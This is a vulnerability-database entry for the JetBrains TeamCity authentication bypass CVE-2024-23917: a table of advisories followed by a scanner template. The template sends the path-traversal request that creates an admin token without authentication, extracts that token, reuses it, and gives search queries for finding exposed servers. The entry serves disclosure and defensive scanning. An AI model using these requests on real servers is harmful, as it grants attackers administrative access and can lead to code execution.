| Title | Published | Views | Reporter |
|---|---|---|---|
| CVE-2024-23917 | 6 Feb 2024 00:00 | – | attackerkb |
| The vulnerability of the Continuous Integration and Deployment Application Delivery system (CI/CD) of JetBrains TeamCity, related to bypassing the authentication process by using an alternative path or channel, allows a hacker to execute arbitrary code. | 7 Feb 2024 00:00 | – | bdu_fstec |
| CVE-2024-23917 | 6 Feb 2024 11:26 | – | circl |
| JetBrains Releases Security Advisory for TeamCity On-Premises | 9 Feb 2024 12:00 | – | cisa |
| JetBrains TeamCity Security Vulnerability | 6 Feb 2024 00:00 | – | cnnvd |
| JetBrains TeamCity Authentication Bypass Vulnerability (CNVD-2025-20493) | 26 Feb 2024 00:00 | – | cnvd |
| CVE-2024-23917 | 6 Feb 2024 09:21 | – | cve |
| CVE-2024-23917 | 6 Feb 2024 09:21 | – | cvelist |
| JetBrains TeamCity Authentication Bypass Flaw, Paving the Way for Server Takeover | 8 Feb 2024 14:38 | – | hivepro |
| CVE-2024-23917 | 6 Feb 2024 10:15 | – | nvd |

```yaml
id: CVE-2024-23917
info:
  name: JetBrains TeamCity > 2023.11.3 - Authentication Bypass
  author: iamnoooob,rootxharsh,pdresearch
  severity: critical
  description: |
    In JetBrains TeamCity before 2023.11.3 authentication bypass leading to RCE was possible
  impact: |
    Unauthenticated attackers can bypass authentication to gain administrative access and potentially execute code on the TeamCity server.
  remediation: |
    Update JetBrains TeamCity to version 2023.11.3 or later.
  reference:
    - https://github.com/fkie-cad/nvd-json-data-feeds
    - https://www.rapid7.com/db/vulnerabilities/jetbrains-teamcity-cve-2024-23917/
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-23917
    cwe-id: CWE-306,CWE-288
    epss-score: 0.5373
    epss-percentile: 0.98867
    cpe: cpe:2.3:a:jetbrains:teamcity:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: jetbrains
    product: teamcity
    shodan-query:
      - "http.title:teamcity"
      - http.component:"teamcity"
    fofa-query: "title=teamcity"
    google-query: "intitle:teamcity"
  tags: cve,cve2024,auth-bypass,teamcity,jetbrains,vkev,vuln
flow: http(1) && http(2)
http:
  - method: POST
    path:
      - "{{BaseURL}}/app/rest/users/id:1/tokens/{{randstr}};.jsp?jsp_precompile=true"
    headers:
      Content-Type: "application/x-www-form-urlencoded"
    matchers:
      - type: dsl
        dsl:
          - status_code==200
          - "contains(content_type,'application/xml')"
          - 'contains(body,"<token name=\"{{randstr}}\"")'
        condition: and
        internal: true
    extractors:
      - type: regex
        part: body
        name: authtoken
        internal: true
        group: 1
        regex:
          - 'value="(.+)"'
  - method: GET
    path:
      - "{{BaseURL}}/app/rest/server"
    headers:
      Authorization: "Bearer {{authtoken}}"
    extractors:
      - type: dsl
        dsl:
          - '"Token:" + authtoken'
    matchers:
      - type: dsl
        dsl:
          - "status_code==200"
          - "contains(content_type,'application/xml')"
          - "contains(body,'<projects href=')"
        condition: and
# digest: 4a0a0047304502205ba8b703246b5f4a4763161943e7fcf2d9055d67dca7ad6f05937c425c4f4bf90221008f97d0d561722cbdd054f9d69e5f6575b8f1018b01016d5222e2835eaf208255:922c64590222798bb761d5b6d8e72950
```